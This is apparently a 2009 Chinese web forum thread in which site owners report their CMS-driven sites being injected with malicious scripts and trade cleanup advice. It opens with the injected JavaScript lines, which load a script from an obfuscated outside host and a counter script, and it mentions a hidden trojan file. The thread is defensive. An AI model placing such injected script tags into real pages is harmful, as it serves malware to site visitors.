document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://08%310.6600.org\" id=\"seraph3script5390\"><\\/script>\');
_dwrite(\"<script language=javascript src=\"+url+\"/count.asp?style=\"+style+\"&referer=\"+escape(document.referrer)+\"></script>\");
function _dwrite(string) {document.write(string);}
都是一样的马!!!!!!!!
终于清除完了,鄙视黑客行为。希望尽快出补丁
本帖最后由 tranbbs 于 2009-8-25 11:46 编辑
bottum.asp 请问这两个文件是隐藏的吗?怎么在相应目录下看不到这个文件?但是用文本替换专家能查找到!
另外不能修改,删除!怎么办?
23# tranbbs
你先重命名 . 改成 q312.wee 这样的
黑客主要攻击时间段在中午和晚上人们休息的时间,我的站中午又挂上了。希望嘉缘尽快出补丁.
还是商业版的好,都没动。
我的今天被挂了2次
刚刚清理了完毕,不知道 下次能不能抗住
25# guanqirui
修改后台路径修改管理员密码,这个是最基本的解决办法,然后彻底清除木马文件。如果只修改路径和密码,木马文件继续存在的话,挂马是可以继续进行的。所以第一修改密码以及路径,第二彻底清除木马文件,然后等待补丁发布。
bottum.asp 请问这两个文件是隐藏的吗?怎么在相应目录下看不到这个文件?但是用文本替换专家能查找到!
另外不能修改,删除!怎么办?
tranbbs 发表于 2009-8-25 11:41 http://bbs.yjys.net/images/common/back.gif
文件在部分用户站点里边是隐藏的,需要服务器管理员配合删除。查看的时候需要在文件夹选项里边把隐藏系统保护文件这一项去掉才可以显示,否则不显示,如果是隐藏的话,在FTP里边是无法删除或者下载的
我的网站的每一个HTML页都加了一个
<meta name=\"verify-v1\" content=\"9SL0sSszEECjSFaENmaCnN5CbQ8+eu0wg5/Fr8fyMTg=\" />
不知道是不木马的代码啊